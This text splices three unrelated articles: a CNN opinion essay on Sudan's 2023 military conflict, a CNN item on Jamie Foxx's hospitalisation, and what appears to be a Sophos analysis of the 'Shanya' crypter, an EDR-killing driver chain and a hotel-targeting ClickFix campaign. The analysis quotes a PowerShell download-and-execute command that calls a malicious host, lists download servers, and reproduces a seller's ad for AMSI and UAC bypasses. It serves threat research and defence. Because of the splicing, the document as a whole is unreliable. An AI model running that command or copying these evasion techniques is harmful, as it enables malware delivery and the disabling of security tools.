Editor’s Note: Justin Lynch is a researcher and analyst in Washington, DC. He is co-author of the book “Sudan’s Unfinished Democracy.” The views expressed here are his own. Read more opinion at CNN.

CNN
 — 

Four years ago, almost to the day, the people of Sudan were celebrating a revolution after overthrowing longtime dictator Omar al-Bashir. Now the East African country faces the possibility of a complete collapse similar to the chaos we see today in Yemen or Libya.

On Saturday, rival military factions began fighting each other in the capital of Khartoum. The two sides battled for control of the nation’s airports, bases and military compounds. Violence quickly spilled into the streets and across the country.

Some 45 million Sudanese effectively are held hostage and are unable to venture out of their homes for fear of being killed in the crossfire. At least 180 people have perished in the fighting, including three World Food Programme humanitarian workers.

The conflict pits two bitter rivals and their powerful armed forces against each other. On one side are the Sudanese Armed Forces (SAF), led by Gen. Abdel Fattah al-Burhan. On the other side are the Rapid Support Forces (RSF), a paramilitary group led by Mohamed Hamdan Dagalo, known as Hemeti.

There is no good side in this conflict. Both have been accused of a long litany of human rights violations.

How did Sudan go from casting off despotic rule and creating a fledgling democracy a few years ago to teetering on the brink of state collapse?

On April 11, 2019, Sudan’s longtime dictator, Bashir, was overthrown. The cause of Bashir’s removal was months of protests led by Sudan’s unions, which spurred a military coup from the SAF and RSF. Both Burhan and Hemeti joined forces to remove their former boss.

It was a moment of promise because there was hope for democracy. I remember walking around the “sit-in” — a giant carnival of freedom in the middle of Khartoum that protesters had blocked off to demand change. It was electric.

But social movements such as the Sudanese Professionals Association (SPA) — the union behind the protest — often struggle to translate the momentum of their demonstrations into real political power.

The reason for this is, in part, structural. Social movements such as the SPA are often based on grassroots activism. A dictator can arrest one or two leaders of an organization but not an entire country.

However, once a dictator is overthrown, these kinds of social movements often struggle to build the leadership hierarchy necessary during political negotiations that take place. Like many other movements, Sudan’s protesters were unable to translate mobilization into political power.

Civilian leaders entered into a negotiation with the military over the future of the country shortly after Bashir fell in April 2019. The two sides were not evenly matched. Because of these leadership challenges, the pro-democracy forces struggled to bargain with the disciplined military.

Any momentum that pro-democracy advocates had during the negotiations was stamped out in June 2019 when RSF soldiers violently dispersed the sit-in. More than 100 people were killed.

After the June massacre and the leadership challenges, a transitional constitution was signed in August 2019 that gave the SAF and RSF most of the power in Sudan. Burhan was the head of state, and Hemeti was placed in an elevated political position. Elections were promised in 2022, but few believed they would actually happen.

The transitional period began in August 2019, and I interviewed Abdalla Hamdok, the civilian prime minister, several times for a book that I co-wrote on Sudan’s revolution. The way that the constitution was written meant that Hamdok had limited power as the prime minister. Burhan was the head of state and wanted to preserve the powers of the SAF.

Hamdok often told me that revolutions come in cycles. The 2019 removal of Bashir was a high point of revolution, and he saw his job as making as many reforms as possible before the low tide of counterrevolution swept him away.

Hamdok found that the legacy of 30 years of dictatorship meant that Sudan’s political and economic models were dilapidated. But Burhan and Hemeti blocked the big reforms that Hamdok wanted to make.

Outside Khartoum violence grew. Parts of Sudan such as Darfur saw a new round of conflict between ethnic groups orchestrated by RSF troops. More than 430,000 people were displaced due to conflict in Sudan, mostly in Darfur.

Soldiers did not hide the atrocities they committed against civilians. I remember drinking tea with a soldier aligned with the RSF at his house in Darfur as he explained why he had recently participated in the burning down of a village from another ethnic group.

The soldier reasoned that a member of his tribe had been killed in an altercation, so the RSF-aligned forces took revenge by torching a village that had been home to 30,000 people. At least 163 people died.

Tensions between the SAF and RSF grew. Burhan viewed Hemeti and his RSF forces as upstart usurpers from Darfur who were undisciplined. Hemeti on the other hand believed that it was time for Darfur to lead Sudan.

Hamdok was on the cusp of beginning to turn the economy around when Burhan and the SAF intervened. As we wrote in the book “Sudan’s Unfinished Democracy,” the potential success of a civilian government was too much for Burhan. In October 2021, Hamdok was removed in a military coup.

After the October 2021 coup, the United States and United Nations pushed a worse version of the transitional constitution in Sudan. They argued that it was the best way to bring democracy.

The idea was to restart the transitional period, but I and many others argued it was shortsighted and wouldn’t work. Returning to a government led by Burhan was clearly not going to usher in democracy. If the plan ended in a coup the first time, why would it work the second time?

Some activists stopped partnering with the US and came to see the UN mission as a roadblock to democracy because of these policies. I felt sorry when I spoke with the best American and foreign diplomats, who also understood the international policy in Sudan wouldn’t work. They saw the flaws but felt powerless to dissent and were forced to carry out decisions made many levels above them.

What preceded this weekend’s outbreak of clashes was a controversial part of the international policy that tried to unify the SAF and RSF. The idea was to make a single army, but neither Hemeti nor Burhan wanted to give up the power they had amassed.

The plan to unify the military hadn’t worked in similar contexts. It was a repeat of the 2013 and 2016 unification processes that took place in South Sudan with similarly bloody results. Instead, the tenuous relationship between Burhan and Hemeti boiled over due to the pressure.

It can be easy to look at the recent history of “revolutions” in countries such as Myanmar, Tunisia, Egypt and Sudan and conclude that they eventually backfire. I don’t agree. I learned from Sudanese activists that a nation’s political fortune is an active battle.

We can one day hope that Sudan sees dreams of democracy come true. But right now, the Sudanese people are just hoping to survive the day.

The lesson from Sudan is that a revolution is only the start of change, not the end.

CNN
 — 

Jamie Foxx remains hospitalized in Georgia nearly a week after his daughter revealed the actor experienced a “medical complication,” a source with knowledge of the matter told CNN on Monday.

His daughter Corinne Foxx shared on Instagram last week that her father had experienced a health-related incident last Tuesday, though she did not specify what occurred. She added in her post that due to “quick action and great care,” her father is “on his way to recovery.”

CNN reported Friday that Foxx was hospitalized and undergoing medical tests.

Foxx has been in Atlanta filming the Netflix movie “Back in Action” with Cameron Diaz. The source previously told CNN that the medical incident did not happen on set and Foxx was not transported by emergency vehicle to the hospital.

A separate source close to production on the film told CNN on Friday that filming is “currently underway” and is expected to wrap up this week.

This source did not elaborate as to whether Foxx still has scenes to film or whether he would be back on set.

CNN has reached out to representatives for Foxx for comment.

We have covered packer-as-a-service offerings from the computer underworld in the past, previously dissecting impersonation campaigns and the rise of HeartCrypt, both popular among ransomware groups. However, it is a fast-changing landscape, and now we are watching a new incarnation of the same type of service: the Shanya crypter — already favored by ransomware groups and taking over (to some degree) the role that HeartCrypt has played in the ransomware toolkit. We’ll look at its apparent origins, unpack the code, and examine a targeted infection leveraging this tool. Sophos protections against this specific packer are covered at the end of the article.

First glimpse: Underground promotions

Near the end of 2024 we found references on underground forums to a new offering, VX Crypt, credited to an entity called ‘Shanya’ (also the name of a river in western Russia). It should be noted that the ID of the post author, which we’ve obfuscated in Figure 1, was not “Shanya” but another string entirely.

Figure 1: A posting in Russian lists the features of “Shanya’s” VX Crypt offering

The interesting part of the English translation of the features reads as follows:

Non-standard module loading into memory, wrapper over the system loaderStub uniqueization. 

Each customer receives their own (relatively) unique stub with a unique encryption algorithm upon purchase.

AMSI bypass for your .NET assemblies; the payload is not detected in memory.Icons, version information, privilege escalation via manifest (UAC Bypass), Autorun with rerun are available.Anti-VM, doesn't run in sandboxes, doesn't unpack in the cloud.

Runtime protection is available for native and 32-bit files (during testing). If it's a RAT (for example), then with this protection it can run undetected for a long time (_Indy inspired)· 

We can try sideloading with the right software. It's possible to load your file in the context of another process, but it takes time to find vulnerabilities in the right software and time for testing.

The contact address for the creator of the packer is a Telegram handle that includes the string “shanya,” as shown in Figure 2:

Figure 2: The post provides “Shanya’s” Telegram contact information (but we don’t)

The described feature set matches characteristics of a packer that we have found in a number of samples, so we believe that our samples contain the same packer-as-a-service that this post identifies as coming from “Shanya.” It is very unlikely that two similar offerings would both be associated with the same name.

Early samples of the crypter

The early samples of the crypter had various artifacts left in the executable. For example, some of the early executable samples (hashes: 58995a6c6042ed15f765a11160690c45f76f8271, 83317a42290ef8577e1980dc6085ab789dcc0c8f) contained an executable name, shanya_crypter.exe, as shown on Line 1 in Figure 3:

Figure 3: Possibly more information than the Shanya developers meant to make available, along with some strange adjective choices

Further early DLL samples had revealing DLL names, consisting of a morphed form of “Shanya.” They also contained information on the purpose of the crypter, which is to bypass the detection capabilities of whatever security solution the target may be using as shown in Figure 4:

Figure 4: The DLL samples include a bad word; this will not be the last time bad words appear in this code

Some of the other names (slightly obfuscated below) were:

• 5h4ny4_f■ck4v_0x000735A5BFC229C.dll
• sh4nya_f■ck4v_0x000CFA853F46C84.dll
• shanya_f■ckav_0x0001DC90D59DCDBE.dll

This appears to be the same packer noted in late spring by Cipher Tech Solutions as the Armillaria loader, which was used to deliver a handful of malware families including BumbleBee, ChuChuka, Lumma, the WHT downloader, and StealC. Later on we found cases of a new EDR killer family and the CastleRAT backdoor using malicious files created by this service.

Where we saw it

Geographic distribution for nascent malware can be useful information. In Shanya’s case, we have encountered the packer in all four hemispheres over the course of 2025, but analysis of infections per capita in affected nations indicated a somewhat higher prevalence in certain countries late in the year, as shown in Figure 5.

Figure 5: A distribution of Sophos-analyzed samples packed by Shanya during September-November 2025. Note that this data includes both customer-operated machines and machines likely to be in use by people testing the packer during this period. Though Tunisia looms large in this chart, UAE is the more interesting case, detecting Shanya far more frequently than the similar-in-size (± 1.1 million) nations of the Czech Republic (Czechia), Austria, and Switzerland. We further note that all the infections we saw in China were geolocated in the Hong Kong-adjacent Shenzen area. (Countries reporting Shanya detections but with

Under the hood: The packed executables

Most of the following analysis is based on the sample with SHA256: 6645297a0a423564f99b9f474b0df234d6613d04df48a94cb67f541b8eb829d1, which is a variant of the EDR killer we will discuss later.

The loader code is highly obfuscated, with miles of junk code such as this:

Figure 6: The junk code flows like a river (perhaps the Shanya)

The purpose of this code is to build a decryptor and loader in a memory region, which would then decrypt the payload.

Hiding in the PEB

Shanya starts by initializing a table structure that contains important data, such as API addresses, that it will require. It then uses an offset to the GdiHandleBuffer field in the PEB (Process Environment Block) as a secure pointer repository for the address of that table. The subsequent stages of the malware only need to call getPEB() and read from a fixed, hardcoded offset (GdiHandleBuffer[46]) to instantly retrieve the complex configuration table, allowing for seamless and untraceable execution continuity. This structure will be used by the next stage, in which the shellcode performs the decoding process.

Figure 7: Calling back to the table smooths execution flow, making the malware less noticeable

API hashing

As with other malware, Shanya dynamically resolves required Windows API functions by first parsing the PEB to locate the PEB_LDR_DATA structure, which contains the linked lists of all loaded modules. Using a custom hashing algorithm, it then parses all export names until a match is found. That algorithm varies from sample to sample.

Anti-analysis check

Shanya calls RtlDeleteFunctionTable(0) & RtlDeleteFunctionTable(1) to perform an anti-analysis check. By triggering the function with an invalid context, the malware attempts to induce an unhandled exception or crash if running under a user-mode debugger, thereby disrupting automated sandboxes and terminating manual analysis attempts before the payload can be fully executed.

Shanya checks whether RtlDeleteFunctionTable is hooked by an EDR. If it is hooked, it calculates the address which points past the EDR’s trampoline and skip to the original, unhooked instructions of RtlDeleteFunctionTable.

Figure 8: Looking for the hook

Payload

The following screenshot shows the intermediate form of the payload, when it is already decrypted but still in compressed form in memory:

Figure 9: The payload is in place, but this isn’t even its final form

It is then decompressed and loaded.

The loader loads a second instance of a Windows system DLL. In all the cases we analyzed, this system component was shell32.dll. Figure 10 shows the module listing in x64dbg to illustrate that there are indeed two instances of shell32.dll in the memory.

Figure 10: One more instance of shell32.dll than ought to be there

Figure 11 shows the original DLL, loaded into the DLL memory space:

Figure 11: A DLL where a DLL should be…

And Figure 12 shows a second copy, loaded into the user code memory space.

Figure 12: …and a DLL where a DLL should not be

The two are apparently identical, with the same PE section names and sizes. But in reality, the beginning of the image (practically speaking, the header and the .text section) is overwritten by the content of the decrypted payload, and then loaded by the undocumented LdrLoadDll Windows function.

The original exported functions contain junk data, as shown in Figure 13:

Figure 13: The “copy” in the user code memory space, with its junk data

The loader then performs one more trick, modifying the entry of the loaded module list (LDR_MODULE).

Both the full DLL name and the base DLL name are modified, as the Figure 14 image of the LDR_DATA_TABLE_ENTRY structure shows:

Figure 14: Mustard?

The modified DLL image is flagged by the PE-SIEVE tool (developed by hasherezade):

    "mapping_scan" : {
     "module" : "1ab0bbf0000",
     "module_file" : "C:\\Windows\\System32\\mustard64.dll",
     "mapped_file" : "C:\\Windows\\System32\\shell32.dll",
     "status" : 1
    }
   },
   {
    "headers_scan" : {
     "status" : 1,
     "module" : "1ab0bbf0000",
     "module_size" : "59000",
     "module_file" : "C:\\Windows\\System32\\shell32.dll",
     "is_connected_to_peb" : 1,
     "is_pe_replaced" : 1,
     "dos_hdr_modified" : 1,
     "file_hdr_modified" : 1,
     "nt_hdr_modified" : 1,
     "ep_modified" : 1,
     "sec_hdr_modified" : 1
    }

In an earlier iteration of the EDR killer the wmp.dll name was used, as shown in Figure 15:

Figure 15: The wmp.dll name in the comments

In other cases a different name was utilized, incorporating a direct (and offensive) callout to hasherezade:

Figure 16: That’s definitely not “wmp.dll” under the black boxes in the comments

In another case, this time involving a 32-bit loader (the payload was StealC), the shanya.dll name was used:

Figure 17: A third example has nothing worth blacking out

Notable use cases

EDR killer

The main characteristics of the Shanya-protected EDR killer are as follows.

It has been used in DLL side-loading scenarios, most commonly including two specific files:

• consent.exe (a clean Microsoft program related to the User Account Control (UAC) feature)
• msimg32.dll (the Shanya-packed malicious DLL)

In other cases, the side-loaded DLL has been named version.dll, rtworkq.dll, or wmsgapi.dll.

It drops two kernel drivers:

• ThrottleStop.sys/rwdrv.sys (legitimate driver from TechPowerUp, abused in this context)
• hlpdrv.sys (a malicious unsigned kernel driver)

The user-mode loader/orchestrator of the user-mode killer is msimg32.dll. First it loads the vulnerable clean driver, as shown in Figure 18:

Figure 18: Loading the ThrottleStop driver

Then, as shown in Figure 19, it loads the malicious driver:

Figure 19: The malicious driver is loaded next

The user-mode killer has a large list of targeted services, as shown in Figure 20:

Figure 20: So many targeted services

And processes:

Figure 21: A long list of processes, including some belonging to Sophos. (That doesn’t mean the attempt is successful, but we’ll get into that in a moment)

These service and process names belong to security products that are targeted by the EDR killer. The user mode killer searches the running processes and installed services. If it finds a match, it sends a kill command to the malicious kernel driver, as shown in Figure 22:

Figure 22: Attempting to smite the security products it finds

The malicious kernel driver abuses the vulnerable clean driver, gaining write access that enables the termination and deletion of the processes and services of the protection products as shown in Figure 23:

Figure 23: And the shutdown

In a typical scenario, we see this sort of activity paired with a ransomware infection. The process tree in Figure 24 shows, as an example, the deployment of the Akira ransomware, along with attempts to execute two different versions of the EDR killer, both in DLL side-loading scenarios:

Figure 24: The process by which the EDR killer clears the way for a ransomware infection, in this case Akira. (The F’s indicate the number of files written or read)

The first deployment we noted of this EDR killer happened near the end of April 2025, in a Medusa attack (as shown in Figure 25). It has been used in multiple ransomware operations since then, most frequently by Akira (as described by GuidePoint Security in August), but also by Qilin and Crytox.

Figure 25: A distribution of Shanya-involved cases analyzed between April and November 2025, week by week

In action: CastleRAT

To give a sense of how this packer manifests in the wild, we’ll look briefly at a malware distribution campaign that utilized Shanya, in this case to target hotels.

It was reported in September 2025 as part of a booking.com-themed ClickFix campaign, as shown in Figure 26:

Figure 26: Reports of the infection appeared on a social media site; the Polish-language “verification” screen shown in the lower half of the image tricks the targeted user into loading malicious code

The file list reported by the researcher, as shown in Figure 27, matches the files we have seen:

Figure 27: Familiar names, unfortunately

We also observed that a PowerShell script was used to download the next stage:

Malware name:    C2_10a (T1071.001)
Beacon time:    2025-09-06T11:32:18.000Z
Command line:    powershell -w h -ep b -c "iex (iwr 'biokdsl[.]com/upd' -useb).Content"

The upd script downloaded and unpacked the consent.zip archive, which contained the DLL side-loading components shown in Figure 28:

Figure 28: Starting to look rather familiar

We have seen the following download servers in use:

• biokdsl[.]com/upd
• biklkfd[.]com/upd

The archive that was downloaded had the name and hash 59906b022adfc6f63903adbdbb64c82881e0b1664d6b7f7ee42319019fcb3d7e: consa[.]zip . It registered for autostart and then executed the clean loader (consent.exe) as shown in Figure 29:

Figure 29: The clean loader abused

The clean executable then loaded the malicious DLL, named wmsgapi.dll, which was inflated by appended bytes to the huge size of 656MB. The final payload here has been identified by RecordedFuture as CastleRAT.

Sophos protections

Sophos protections against this malware include, but are not limited to, ATK/Shanya-B,  ATK/Shanya-C, and  ATK/Shanya-D.

Conclusion

Packer-as-a-service offerings and EDR killers will both be with us for the foreseeable future. The combination of the two is very popular with ransomware groups. Because there is a need and a financial motive, we can’t expect this particular malware type to go away anytime soon – and we will doubtless find further-evolved versions in the future.

Indicators of compromise

A set of indicators of compromise associated with Shanya is provided on our GitHub.